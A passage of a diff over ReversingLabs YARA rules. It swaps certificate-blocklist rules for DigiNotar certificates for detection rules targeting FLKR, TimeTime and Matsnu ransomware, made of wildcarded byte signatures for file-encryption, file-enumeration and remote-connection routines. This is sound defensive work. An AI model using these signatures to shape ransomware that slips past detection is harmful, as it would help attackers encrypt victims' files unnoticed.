G2" and pe.signatures[i].serial=="01:31:34:bf" and 1308182400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($bc_main_1 at pe.entry_point) and $bc_main_2 and $bc_main2 and $bc_bcdedit and $bc_enum_drives_a_z and $bc_do_extensions_1 and $bc_do_extensions_2 and $bc_do_files_1 and $bc_do_files_2 } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_01314476 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_FLKR : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects FLKR ransomware." author = "ReversingLabs" - id = "e0a52ad1-cebd-5ffc-953f-e0b09fc6d710" - date = "2023-11-08" - modified = "2023-11-08" + id = "7f3abcd0-8dfa-5914-9ad0-566c16c2e2ab" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L837-L853" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6f2f3f3ae009fbb9ebe589fc6b640be89c4a7b734eda515f182c7e9c9ffb4779" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.FLKR.yara#L1-L71" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4ab00ba82baceec9899556d3a774ec08c83c10930cec194e18e3b4e16ebacb58" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "FLKR" + tc_detection_factor = 5 importance = 25 + strings: + $search_and_encrypt_p1 = { + 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 8B BC 24 ?? + ?? ?? ?? 57 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 89 44 + 24 ?? FF D5 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? + ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 51 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 8D 54 24 ?? 52 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8D 4C 24 ?? 51 + 57 C6 04 07 ?? FF D5 F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 84 + C0 0F 85 ?? ?? ?? ?? 8A 0F 33 D2 84 C9 74 ?? BE ?? ?? ?? ?? 8B C7 2B F7 88 0C 06 8A + 48 ?? 40 42 84 C9 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 82 ?? ?? ?? ?? ?? C6 82 ?? + ?? ?? ?? ?? FF D5 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 + 74 ?? 56 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 + ?? 68 ?? ?? ?? ?? 57 FF D5 57 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 38 44 24 ?? 74 + } + $search_and_encrypt_p2 = { + 40 80 7C 04 ?? ?? 75 ?? 8A 4C 04 ?? 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ?? 80 7C 04 ?? + ?? 75 ?? 80 7C 04 ?? ?? 74 ?? 80 F9 ?? 75 ?? B3 ?? 38 5C 04 ?? 75 ?? 80 7C 04 ?? ?? + 75 ?? 80 7C 04 ?? ?? 75 ?? 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 05 ?? ?? ?? ?? E9 ?? + ?? ?? ?? FF 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? B3 ?? B2 ?? 80 F9 ?? 75 ?? 38 5C 04 ?? 75 + ?? 80 7C 04 ?? ?? 75 ?? 38 5C 04 ?? 75 ?? 32 D2 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ?? + 80 7C 04 ?? ?? 75 ?? 80 7C 04 ?? ?? 75 ?? 32 D2 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ?? + 80 7C 04 ?? ?? 75 ?? 80 7C 04 ?? ?? 0F 84 ?? ?? ?? ?? 84 D2 0F 84 ?? ?? ?? ?? 8A 0F + 33 D2 84 C9 74 ?? 8D B4 24 ?? ?? ?? ?? 8B C7 2B F7 8D A4 24 ?? ?? ?? ?? 88 0C 06 8A + 48 ?? 40 42 84 C9 75 ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 0F B6 + 05 ?? ?? ?? ?? C6 84 14 ?? ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 8B 15 + ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 33 C0 6A ?? 89 8C 24 ?? ?? ?? ?? 89 94 24 ?? ?? ?? + ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 68 ?? ?? ?? ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 0D ?? + ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B E8 A1 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 8B 0D ?? ?? ?? + ?? 89 84 24 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 66 8B 15 ?? ?? ?? + ?? 89 8C 24 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 8D 74 24 ?? 89 6C 24 ?? 66 89 + } + $search_and_encrypt_p3 = { + 94 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? + 52 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 + E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 56 + 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 + 8D 84 24 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A + ?? 51 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 + ?? 56 E8 ?? ?? ?? ?? 8B 7C 24 ?? 83 C4 ?? FF 05 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 + FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 2B F0 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 03 + C6 50 8D 8C 24 ?? ?? ?? ?? 51 8B D1 52 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF + 15 ?? ?? ?? ?? 85 C0 75 ?? FF 05 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 55 E8 ?? ?? + ?? ?? 8B 2D ?? ?? ?? ?? 83 C4 ?? 8B 74 24 ?? 8D 4C 24 ?? 51 56 FF 15 ?? ?? ?? ?? 85 + C0 0F 85 ?? ?? ?? ?? 56 FF 15 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar PKIoverheid CA Overheid" and pe.signatures[i].serial=="01:31:44:76" and 1308182400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($search_and_encrypt_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_013169B0 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Timetime : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects TimeTime ransomware." author = "ReversingLabs" - id = "a5f68c0a-635a-5aa9-94d2-7628999f06c2" - date = "2023-11-08" - modified = "2023-11-08" + id = "27bff941-01ce-5bf7-a9d8-d01d2db3bfd3" + date = "2022-02-21" + modified = "2022-02-21" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L855-L871" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "354421ebad7fd0b73c9ba63630c91d481901ca9ec39be3c6b66843221e4b5aad" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.TimeTime.yara#L1-L75" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "43867dd793bc84e6f39ca2de1aff4047a742b295dc4df94cd337bd2ef89e4a62" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "TimeTime" + tc_detection_factor = 5 importance = 25 + strings: + $rename_files = { + 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 12 ?? 28 ?? ?? ?? ?? 0B 00 07 28 ?? ?? ?? + ?? 16 FE 01 0C 08 2C ?? 2B ?? 00 00 07 07 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? + 6F ?? ?? ?? ?? 00 DC 2A + } + $find_files = { + 00 73 ?? ?? ?? ?? 0A 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 07 2C ?? 06 0C DD ?? ?? ?? + ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? + 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C + ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? + ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DE ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 + ?? 11 ?? 9A 13 ?? 00 06 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 + 32 ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 00 06 11 ?? 28 ?? + ?? ?? ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ?? 13 ?? + 00 00 DE ?? 06 0C 2B ?? 08 2A + } + $encrypt_folder = { + 00 02 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 0C + 00 00 08 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 01 0D 09 2C ?? 00 16 13 ?? 16 13 ?? 08 73 + ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 08 19 + 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 00 DE ?? + 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 11 ?? 16 FE 01 11 ?? 5F 11 ?? 5F 13 ?? 11 ?? 2C + ?? 00 08 28 ?? ?? ?? ?? 00 00 00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 3A ?? + ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A + } + $encrypt_files = { + 00 02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 2C ?? 38 ?? ?? ?? ?? 02 7E ?? ?? ?? ?? 6F ?? + ?? ?? ?? 0D 09 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 0A 06 8E 69 8D ?? ?? ?? ?? 0B 16 13 ?? 2B + ?? 00 06 11 ?? 91 13 ?? 11 ?? 17 58 D1 13 ?? 11 ?? D2 13 ?? 07 11 ?? 11 ?? 9C 00 11 ?? + 17 58 13 ?? 11 ?? 07 8E 69 FE 04 13 ?? 11 ?? 2D ?? 02 07 28 ?? ?? ?? ?? 00 02 02 7E ?? + ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 7E + ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 00 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar PKIoverheid CA Overheid en Bedrijven" and pe.signatures[i].serial=="01:31:69:b0" and 1308182400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($encrypt_folder) and ($rename_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0C76Da9C910C4E2C9Efe15D058933C4C : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Matsnu : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Matsnu ransomware." author = "ReversingLabs" - id = "a9b06d49-1ab2-539e-bd1f-16da40b654b2" - date = "2023-11-08" - modified = "2023-11-08" + id = "2f0bddd5-bd48-5d38-84f4-2dbccbe04a46" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L873-L889" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "883e93bff42161ba68f69fb17f7e78377d7f3cb6b6cdf72cffb4166466f8bc7b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Matsnu.yara#L1-L116" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "76ef1b4a292f27ccd904e80f0279a7a327f7399a21f2266ef3ea959e5339ffac" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Matsnu" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Root CA" and pe.signatures[i].serial=="0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c" and 1308182400<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_469C2Caf : INFO FILE -{ - meta: - description = "The digital certificate has leaked." - author = "ReversingLabs" - id = "12d7c4a8-0a84-502a-855b-674972a2e2e1" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L891-L907" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2490dbd74a5d3eede494d284f96af835c270d2fb0752b887aadbaf92bf34e6d4" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $remote_connection = { + 55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C6 45 ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B 8D 83 ?? ?? ?? ?? 8B 00 6A ?? 50 + FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D 7D ?? 57 56 FF 93 ?? ?? ?? ?? 85 C0 74 + ?? 57 8D BB ?? ?? ?? ?? 89 07 5F EB ?? 8D B3 ?? ?? ?? ?? 8B 36 57 8D BB ?? ?? ?? ?? + 89 37 5F 68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? EB ?? 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A + ?? 57 FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 + 57 FF 93 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 50 57 FF 93 ?? ?? ?? ?? 85 + C0 74 ?? C6 00 ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8D 93 ?? ?? + ?? ?? FF 75 ?? 52 51 56 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 4D ?? 51 57 E8 ?? + ?? ?? ?? 85 C0 74 ?? 89 45 ?? 8D 4D ?? 51 50 E8 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF + 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 89 85 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? + ?? 8B 45 ?? 8B 75 ?? 89 06 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 83 BD ?? + ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + 68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D 83 ?? ?? ?? ?? 50 56 FF + 93 ?? ?? ?? ?? 85 C0 74 ?? 40 57 8D BB ?? ?? ?? ?? 89 07 5F E9 ?? ?? ?? ?? 8D B3 ?? + ?? ?? ?? 8B 36 57 8D BB ?? ?? ?? ?? 89 37 5F 68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? E9 ?? + ?? ?? ?? 8D 83 ?? ?? ?? ?? 8B 00 50 FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? + ?? ?? C9 C2 + } + $crypto_file = { + 55 89 E5 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? + C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? E8 + ?? ?? ?? ?? 5B 8D 83 ?? ?? ?? ?? 8B 00 85 C0 74 ?? 89 45 ?? 8D 83 ?? ?? ?? ?? 8B 00 + 85 C0 74 ?? 8D 7D ?? 8D 75 ?? 8D 4D ?? 51 56 57 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? + 89 45 ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? FF 75 ?? + FF 93 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 8B 45 + ?? 8B 5D ?? C9 C2 + } + $crypt_file = { + 55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 5B 8D BD ?? ?? ?? ?? FF 75 ?? 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D B3 ?? ?? ?? + ?? 56 57 FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 93 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 30 FF 93 ?? + ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 4D ?? 8D 85 ?? ?? ?? ?? 6A ?? + FF 31 50 FF 36 FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 8D B5 ?? ?? ?? ?? 51 6A ?? FF 36 68 ?? ?? ?? ?? FF 30 FF 93 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 89 45 + ?? 6A ?? FF 75 ?? FF 93 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF + 75 ?? FF 93 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 45 ?? 8D 7D ?? 8D 75 ?? 8D 55 + ?? 52 56 57 FF 75 ?? FF 93 ?? ?? ?? ?? 8B 45 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D + 45 ?? 6A ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + FF 75 ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 + ?? FF 75 ?? E8 ?? ?? ?? ?? 8D 7D ?? 8D B5 ?? ?? ?? ?? FF 75 ?? 57 FF 75 ?? 6A ?? 6A + ?? 6A ?? FF 36 FF 93 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? + ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 45 ?? 8D 45 ?? 6A ?? 50 FF 75 ?? + FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 85 C0 74 ?? 8D 7D ?? 8D 75 ?? 8D 55 ?? 52 56 57 + FF 75 ?? FF 93 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D B3 ?? + ?? ?? ?? FF 06 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 93 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 50 FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 50 FF 93 ?? ?? ?? ?? + 83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? FF 93 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2 + } + $enum_files_1 = { + 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B E8 ?? + ?? ?? ?? 8D 7D ?? 6A ?? FF 75 ?? 57 FF 93 ?? ?? ?? ?? 8D 7D ?? 57 FF 93 ?? ?? ?? ?? + 83 F8 ?? 74 ?? EB ?? 8D 75 ?? 56 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C9 C2 + } + $enum_files_2 = { + 55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? + 66 C7 45 ?? ?? ?? C6 45 ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B 83 7D ?? ?? 0F 84 + ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 83 C0 ?? 89 45 ?? 40 50 6A ?? FF 93 ?? ?? ?? + ?? 85 C0 0F 84 ?? ?? ?? ?? 89 45 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8D 75 ?? 56 + FF 75 ?? FF 93 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 57 FF 75 ?? FF 93 ?? ?? ?? ?? 83 F8 ?? + 0F 84 ?? ?? ?? ?? 89 45 ?? 6A ?? FF 93 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 55 ?? 8D B5 + ?? ?? ?? ?? 52 56 FF 93 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 55 ?? 8D B5 ?? ?? ?? ?? 52 + 56 FF 93 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? FF 93 ?? ?? ?? ?? 40 89 45 ?? 8D BD + ?? ?? ?? ?? 57 FF 93 ?? ?? ?? ?? 03 45 ?? 89 45 ?? 40 50 6A ?? FF 93 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? 89 45 ?? FF 75 ?? FF 75 ?? FF 93 ?? ?? ?? ?? 8D 75 ?? 56 FF 75 + ?? FF 93 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 56 FF 75 ?? FF 93 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? A9 ?? ?? ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? E8 